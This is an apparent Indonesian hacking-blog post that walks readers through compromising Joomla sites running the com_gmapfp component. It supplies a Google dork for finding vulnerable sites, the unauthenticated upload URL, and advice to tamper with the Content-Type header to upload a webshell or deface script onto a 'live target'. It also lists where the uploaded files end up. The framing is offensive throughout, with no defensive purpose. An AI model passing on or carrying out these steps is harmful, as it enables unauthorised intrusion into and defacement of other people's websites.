-
Hai sobat
Saya ikal,
Disini saya akan share sesuatu nih.
-
Jadi tadi saya sedang mencari referensi-referensi menarik di cxsecurity. Dan saya mendapatkan exploit ini :D.
Langsung saja kepembahasan.
Bahan :
Webshell : download sendiri
Google Dork : inurl:/index.php?option=com_gmapfp
Exploit : /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
1. Dorking
Dorking dengan dork diatas dan choose 1 target untuk dieksekusi. Disini saya memakai live target yah,
Live target :
Sedikit penjelasan mengenai perbedaan authenticated dan unauthenticated adalah masalah hak lebih kedalam server. Jika authenticated,kita memerlukan hak akses lebih kedalam server seperti login sebagai admin dan sebagainya. Dan jika unauthenticated itu kebalikannya, okeh!.
2. Eksekusi
Lanjut jika sudah menentukan target,kita masukan exploitnya kedalam url. Dan jika ada form upload seperti dibawah ini, maka bisa dikatakan vuln.
Upload file yang kalian inginkan kedalam server, namun disana terdapat sebuah filter yang hanya mengaccept file dengan Content-Type : image/jpeg atau yang lainnya. Jadi saya sarankan kalian coba melakukan tamper data untuk mengupload Webshell atau script deface kalian :D.
Dan untuk file aksesnya adalah :
http://localhost/images/stories/gmapfp/test.html.gif
http://localhost/images/gmapfp/test2.html.gif
http://localhost/images/gmapfp/test2.html.gif
Referensi : https://cxsecurity.com/issue/WLB-2020090037
Sekian dari saya, bila ada yang kurang atau salah kata, biarkan saja.
Thanks
See u